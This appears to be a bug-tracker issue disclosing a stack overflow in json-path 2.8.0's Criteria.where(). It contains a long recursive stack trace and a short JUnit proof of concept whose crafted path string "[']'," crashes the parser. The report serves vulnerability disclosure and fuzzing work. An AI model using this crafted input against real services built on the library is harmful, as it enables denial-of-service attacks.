Stack Overflow (Criteria.where()) #970
Description
Stack Overflow (Criteria.where())
Description
A stack overflow vulnerability exists in the Criteria.where() method in json-path 2.8.0. Specially crafted input can cause uncontrolled recursion, resulting in stack overflow.
Error Log
java.lang.StackOverflowError
at com.jayway.jsonpath.internal.CharacterIndex.currentChar(CharacterIndex.java:41)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:133)
at com.jayway.jsonpath.internal.path.PathCompiler.readDotToken(PathCompiler.java:175)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:143)
at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
at com.jayway.jsonpath.internal.path.PathCompiler.readDotToken(PathCompiler.java:175)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:143)
at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
at com.jayway.jsonpath.internal.path.PathCompiler.readDotToken(PathCompiler.java:175)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:143)
at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
at com.jayway.jsonpath.internal.path.PathCompiler.readDotToken(PathCompiler.java:175)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:143)
at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
at com.jayway.jsonpath.internal.path.PathCompiler.readDotToken(PathCompiler.java:175)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:143)
at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
at com.jayway.jsonpath.internal.path.PathCompiler.readDotToken(PathCompiler.java:175)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:143)
at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
at com.jayway.jsonpath.internal.path.PathCompiler.readDotToken(PathCompiler.java:175)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:143)
at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
at com.jayway.jsonpath.internal.path.PathCompiler.readDotToken(PathCompiler.java:175)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:143)
at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
at com.jayway.jsonpath.internal.path.PathCompiler.readDotToken(PathCompiler.java:175)
PoC
<dependency>
<groupId>com.jayway.jsonpath</groupId>
<artifactId>json-path</artifactId>
<version>2.8.0</version>
</dependency>import com.jayway.jsonpath.Criteria;
import org.junit.Test;
public class CriteriaFuzzerWhere1 {
// Stack overflow
@Test
public void whereFuzzerTest() {
try {
Criteria result = Criteria.where("[']',");
} catch (Exception e) {
}
}
}